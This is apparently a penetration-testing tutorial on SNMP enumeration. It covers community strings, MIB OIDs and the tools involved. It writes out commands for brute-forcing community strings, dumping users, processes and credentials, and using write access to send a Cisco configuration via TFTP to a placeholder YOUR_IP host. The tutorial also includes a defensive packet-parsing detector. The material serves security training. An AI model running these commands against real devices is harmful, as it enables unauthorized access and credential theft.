SNMP Enumeration

intermediate · 25 min · Writeup

Extracting sensitive information via SNMP

Learning Objectives

  • Understand SNMP protocol
  • Enumerate SNMP communities
  • Extract system information
  • Find credentials via SNMP

SNMP (Simple Network Management Protocol) was designed to help administrators monitor and manage network devices. In practice, it's like giving everyone a master key to your building and hoping they'll only use it to check if the lights are on.

Running on UDP port 161, SNMP is found on routers, switches, printers, servers, and IoT devices. The protocol is notoriously insecure - especially SNMP v1 and v2c, which use cleartext "community strings" as passwords. These strings are often left at defaults: "public" for read access and "private" for write access.

SNMP = Security Not My Problem

That's the industry joke, and it's painfully accurate. SNMP can expose usernames, running processes, network configurations, and even credentials. Many admins don't even know SNMP is enabled.

SNMP Basics

SNMP Versions

  • SNMP v1: Original, cleartext, weak security
  • SNMP v2c: Better performance, still cleartext
  • SNMP v3: Encryption and authentication (rare)

Community Strings

Community strings are essentially passwords. SNMPv1/v2c send them in cleartext:

  • Read-only (RO): Usually "public" - can read all data
  • Read-write (RW): Usually "private" - can modify device
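To make the cleartext point concrete, here is an added example (not from this writeup or from any tool it names) that parses the BER header of an SNMP v1/v2c message straight from the raw bytes and flags what a network sensor would alert on: a default community string, and any SetRequest (write) PDU. The two sample packets are constructed by hand, not captured traffic.

```python
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA5: "GetBulkRequest"}
VERSIONS = {0: "v1", 1: "v2c", 3: "v3"}
DEFAULT_COMMUNITIES = {"public", "private"}   # the defaults the writeup warns about

def read_tlv(buf, pos):
    """Return (tag, value_bytes, next_pos) for the BER element at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: next N bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_snmp_header(packet):
    """Extract version, community string and PDU type from one SNMP message."""
    tag, body, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message: outer SEQUENCE missing")
    tag, ver, pos = read_tlv(body, 0)           # INTEGER version
    version = int.from_bytes(ver, "big")
    if version == 3:                            # v3 header carries no community string
        return {"version": "v3", "community": None, "pdu": None}
    tag, community, pos = read_tlv(body, pos)   # OCTET STRING community, in cleartext
    if tag != 0x04:
        raise ValueError("expected OCTET STRING community")
    pdu_tag = body[pos]                         # context tag of the PDU that follows
    return {"version": VERSIONS.get(version, str(version)),
            "community": community.decode("ascii", "replace"),
            "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag))}

def alerts(packet):
    """Flag a default community on the wire and any SetRequest (write) PDU."""
    h = parse_snmp_header(packet)
    found = []
    if h["community"] in DEFAULT_COMMUNITIES:
        found.append(f"default community '{h['community']}' over SNMP{h['version']}")
    if h["pdu"] == "SetRequest":
        found.append("SetRequest (write) PDU observed")
    return h, found

# Constructed samples (not captured traffic): a v2c GetRequest for sysDescr.0
# with community "public", and a v2c SetRequest on sysName.0 with "private".
SAMPLE_GET = bytes.fromhex("3027020101" "04067075626c6963" "a01a02021234020100020100"
                           "300e300c06082b06010201010100" "0500")
SAMPLE_SET = bytes.fromhex("3029020101" "040770726976617465" "a31b02021234020100020100"
                           "300f300d06082b06010201010500" "040178")
if __name__ == "__main__":
    for pkt in (SAMPLE_GET, SAMPLE_SET):
        print(alerts(pkt))
```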

MIB - Management Information Base

The MIB is a hierarchical database of managed objects, each addressed by an OID, that can be queried. Think of it as a tree where each branch leads to different information:

  • 1.3.6.1.2.1.1.1.0 - System description
  • 1.3.6.1.2.1.1.3.0 - System uptime
  • 1.3.6.1.2.1.1.5.0 - System name
  • 1.3.6.1.4.1.77.1.2.25 - Windows user accounts
  • 1.3.6.1.2.1.25.4.2.1.2 - Running processes
  • 1.3.6.1.2.1.6.13.1.3 - TCP connections

SNMP Discovery

bash
# Nmap SNMP detection
nmap -sU -p 161 192.168.1.0/24
nmap -sU -p 161 --script snmp-info 192.168.1.10

# Check for common community strings
nmap -sU -p 161 --script snmp-brute 192.168.1.10

# Onesixtyone - fast community string scanner
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.10
onesixtyone -c community.txt -i hosts.txt

SNMP Enumeration

SNMPwalk

SNMPwalk queries entire subtrees of the MIB, dumping all accessible information. It's the go-to tool for SNMP enumeration.

bash
# Walk entire MIB tree
snmpwalk -v2c -c public 192.168.1.10

# Walk specific OID
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1

# Get system info
snmpwalk -v2c -c public 192.168.1.10 system

# Get network interfaces
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.2.2

# Get installed software (Windows)
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.6.3.1.2

# Get running processes
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.4.2.1.2

# Get open TCP connections
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.6.13.1.3

SNMPcheck

bash
# Comprehensive SNMP enumeration
snmp-check 192.168.1.10
snmp-check -c public 192.168.1.10
snmp-check -c public -v2c 192.168.1.10

Windows User Enumeration

On Windows systems, OID 1.3.6.1.4.1.77.1.2.25 returns local user accounts. This is gold for password attacks!

Community String Brute Force

bash
# Using onesixtyone (fastest)
onesixtyone -c community-strings.txt -i hosts.txt

# Using Hydra
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.10 snmp

# Using Metasploit
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
run

# Nmap brute
nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=communities.txt 192.168.1.10

Common Community Strings

Beyond "public" and "private", try: admin, manager, secret, cisco, cable-docsis, and company-specific variations.

Windows SNMP

bash
# Enumerate Windows users
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.25

# Enumerate Windows shares
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.27

# Enumerate running services
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.4.1.77.1.2.3.1.1

# Enumerate installed software
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.6.3.1.2

# Enumerate storage
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.2.3.1.3

# Enumerate processes with paths
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.25.4.2.1.4

# Enumerate listening ports
snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.6.13.1.3

Linux SNMP

bash
# Running processes
snmpwalk -v2c -c public 192.168.1.10 hrSWRunName

# Memory usage
snmpwalk -v2c -c public 192.168.1.10 hrMemorySize

# Mount points
snmpwalk -v2c -c public 192.168.1.10 hrFSMountPoint

# Process parameters (might include credentials!)
snmpwalk -v2c -c public 192.168.1.10 hrSWRunParameters

Credentials in Process Lists

Process command lines can contain credentials passed as arguments! Look for mysql, ssh, rsync commands with passwords.

SNMP Write Access

If you have write access (usually with "private" community string), you can modify device configurations - potentially catastrophic.

bash
# Check for write access
snmpset -v2c -c private 192.168.1.10 1.3.6.1.2.1.1.5.0 s "NewSystemName"

# If successful, you have write access!

# Download device config (Cisco)
# This requires write access to create TFTP transfer
snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1
snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4
snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1
snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a YOUR_IP
snmpset -v2c -c private 192.168.1.10 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s "config.txt"

SNMP v3

SNMP v3 adds authentication and encryption. It's more secure but still attackable if credentials are weak.

bash
# SNMP v3 enumeration
snmpwalk -v3 -u admin -l authNoPriv -a MD5 -A password123 192.168.1.10

# With encryption
snmpwalk -v3 -u admin -l authPriv -a SHA -A authpass -x AES -X privpass 192.168.1.10

# Brute force v3 credentials
nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=passwords.txt 192.168.1.10

SNMP Enumeration Methodology

SNMP Enumeration Process

1. Discovery: Scan for UDP 161 across the network
2. Community Brute: Try common community strings
3. System Info: Query system description and name
4. User Enum: Extract user accounts
5. Process Enum: Get running processes and parameters
6. Network Info: Enumerate interfaces and connections
7. Write Test: Check for write access if "private" is found

Knowledge Check

Quick Quiz

What are the default SNMP community strings?

Challenges

SNMP User Hunt

Challenge (🌱 beginner)

Find a device running SNMP and enumerate all local user accounts.


Process Credential Leak

Challenge (🔥 intermediate)

Find credentials exposed in process command lines via SNMP.


Key Takeaways

  • SNMP runs on UDP port 161 - often forgotten and misconfigured
  • Default community strings are "public" (read) and "private" (write)
  • SNMPv1/v2c send community strings in cleartext
  • SNMP can expose users, processes, shares, and network config
  • Process command lines may contain credentials
  • Write access can allow device reconfiguration
  • onesixtyone is fastest for community string brute forcing